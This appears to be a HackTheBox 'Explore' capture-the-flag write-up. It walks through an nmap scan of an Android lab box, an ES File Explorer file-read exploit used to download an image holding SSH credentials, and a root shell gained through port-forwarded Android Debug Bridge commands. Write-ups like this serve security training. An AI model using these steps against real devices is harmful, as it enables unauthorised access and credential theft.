HackTheBox — Explore

4 min readJan 26, 2022

As always we start with nmap to discover open ports.

Nmap Scan

nmap -sC -sV -oA explore

Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-02 15:57 EET
Nmap scan report for (
Host is up (0.14s latency).

2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
35971/tcp closed unknown
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Device: phone


First of all, lets look for exploits for these services (ES File Explorer & Bukkit JSONAPI). Found an arbitrary file read exploit for ( ES File Explorer and didn’t find any other exploits, so lets just try it.


By reading the exploit code, it’s sending a POST request with Content-Type: application/json header and a json POST data as {“command”: cmd} to

Lets first try the exploit manually before running the python script. Now visit intercept the request with burp or ZAP and send to repeater and edit the request as the exploit says. And we got a response with the device info.

Now that we understand how the exploit works, lets run the script because it parses the json response and make our life easier.

While enumeration i found that the ES File Explorer version is, that’s why the exploit works ( if there’s an exploit for a specific version, it may work on older versions too).

Initial Foothold

While trying every command i tried listPics and found interesting picture (creds.jpg).

I downloaded this picture using python3 exploit.py getFile /storage/emulated/0/DCIM/creds.jpg and opened it. It has credentials in it.


Now lets ssh to the box with these creds and we are in.

Getting root

Doing some research on the ports we found earlier, Port 5555 is for Android Debug Bridge (ADB) connections. And found on hacktricks how to use this service to get root shell.



  • First, We have to do port forwarding using ssh because the service is running on localhost only. ssh -p 2222 -L 1337:localhost:5555 kristi@
  • That means ==>
  • Connect to ADB service (port 5555) using adb tool. adb connect <IP>:<PORT>
  • Check if the phone is connected to your pc. adb devices
  • Now using adb tool we can do anything on the device, so to get root type adb root
  • to restart adbd daemon with root permissions.
  • Connect again to the ADB service. adb connect <IP>:<PORT>
  • Finally. adb shell

If you find it useful, kindly give me a respect

Linkedin | Github




I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.